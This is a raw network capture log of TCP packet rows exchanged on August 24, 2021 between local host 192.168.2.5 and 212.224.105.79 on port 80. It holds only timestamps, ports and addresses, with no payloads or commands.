Aug 24, 2021 08:49:17.549546957 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549551010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549570084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549586058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549593925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549603939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549618006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549621105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549637079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549643993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549654007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549665928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549669981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549689054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549699068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549706936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549722910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549735069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549741030 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549757957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549774885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549783945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549791098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549808025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549818993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549828053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549845934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549849033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549864054 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549873114 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549881935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549900055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549911976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549916029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549932957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549945116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549949884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549968958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.549971104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.549985886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550002098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550017118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550018072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550034046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550046921 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550049067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550065041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550081015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550081015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550101042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550108910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550118923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550136089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550152063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550165892 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550168991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550185919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550194979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550201893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550216913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550219059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550239086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550250053 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550256968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550272942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550290108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550290108 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550304890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550323009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550324917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550338984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550349951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550354958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550378084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550383091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550400019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550415993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550435066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550452948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550461054 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550467968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550486088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550487995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550503016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550510883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550520897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550534010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550549984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550555944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550566912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550582886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550589085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550600052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550616980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550630093 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550632954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550652981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550671101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550673962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550688028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550704956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550708055 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550721884 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550734997 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550738096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550755024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550771952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550782919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550792933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550812006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550825119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550827980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550844908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550857067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550862074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550879002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550890923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550894976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550910950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550915003 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550930977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550937891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550949097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550965071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550978899 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.550981998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.550997972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551011086 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551013947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551029921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551037073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551047087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551067114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551085949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551088095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551101923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551134109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551135063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551151991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551156998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551167965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551183939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551187992 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551201105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551217079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551237106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551239967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551254034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551271915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551279068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551287889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551297903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551305056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551321983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551336050 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551338911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551356077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551374912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551377058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551395893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551399946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551413059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551429987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551445961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551454067 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551461935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551477909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551495075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551498890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551513910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551527023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551532984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551551104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551556110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551563978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551578999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551579952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551599979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551614046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551616907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551632881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551649094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551652908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551666975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551673889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551682949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551701069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551717043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551724911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551737070 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551757097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551760912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551772118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551783085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551789045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551805019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551815033 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551820993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551837921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551855087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551856041 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551873922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551882029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.551892042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.551929951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.926374912 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.930506945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.640351057 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.640379906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.663629055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.690984011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.729324102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.731951952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.754791975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.779416084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.790589094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.790613890 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.819242954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.880877018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.880940914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.880959988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.880975962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.880991936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.881007910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.881022930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.881023884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.881118059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.881122112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.881127119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.881144047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.881295919 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.881313086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.881429911 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.903713942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903748035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903764963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903780937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903796911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903817892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903852940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903870106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903886080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903934002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.903950930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.903966904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.903985977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904001951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904017925 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904036999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904046059 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.904050112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.904103041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904119968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904135942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904155970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904172897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.904175043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.904196978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904216051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.904272079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.905399084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927135944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927176952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927195072 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927211046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927229881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927253008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927275896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927294970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927305937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927314043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927318096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927330971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927349091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927365065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927390099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927393913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927397013 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927452087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927468061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927486897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927498102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927500010 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927509069 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927526951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927544117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927561045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927580118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927593946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927597046 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927599907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927623034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927639961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927656889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927659988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927664042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927674055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927730083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927733898 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927788973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927804947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927817106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927833080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927854061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927879095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927881956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.927911997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927927017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927942991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927958965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.927970886 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.928003073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.928005934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.928421974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.928442001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.928457975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.928504944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.928510904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.942765951 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.944878101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.950973988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951016903 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951047897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951078892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951086998 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951131105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951178074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951206923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951208115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951237917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951272964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:19.951302052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:19.951303959 CEST	80	49712	212.224.105.79	192.168.2.5
